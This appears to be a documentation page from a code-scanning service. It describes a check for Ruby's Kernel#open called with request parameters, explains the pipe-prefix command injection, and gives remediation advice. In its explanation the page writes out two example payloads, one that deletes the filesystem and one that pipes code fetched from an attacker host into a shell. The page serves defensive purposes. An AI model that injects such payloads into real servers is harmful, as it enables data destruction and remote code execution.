Will It Vibe logoWill It Vibe?
RAILS-016Medium severity-8 points

Kernel#open called with request-controlled input

Part of Security, which counts for 30% of the overall score. When this check fires it deducts 8 points from that category, once per scan, no matter how many places it turns up.

What it detects

Ruby's Kernel#open treats an argument starting with a pipe character as a shell command once open-uri is loaded, so open(params[:url]) lets a client run arbitrary shell commands by prefixing a value with '|'. Heuristic: a class-defined method literally named open on some receiver also matches this pattern and is a false positive.

Why it matters

Ruby's Kernel#open, loaded by the open-uri library that many HTTP-fetching gems pull in, treats an argument starting with a pipe character as a shell command to run rather than a file or URL to open. If open() is called with a value taken from params, a client can submit a value like '|rm -rf /' or '|curl attacker.example/x | sh' and have it executed as a shell command on the server.

How to fix it

Replace open(...) with URI.parse(url).open (or URI.open in newer Ruby) restricted to an explicit allowlist of hosts/schemes, or use a plain HTTP client (Net::HTTP, Faraday, HTTParty) that never has pipe-as-command semantics in the first place. Validate the value is actually a well-formed http/https URL before it reaches any open call.

The paid report includes a ready-to-paste prompt for your AI coding agent for every check it finds, pointed at the exact findings from your scan. See pricing

Does your repo trip this check?

Paste a GitHub URL or drop a project folder. Scans run in your browser and take seconds.

Scan your repo

Related Security checks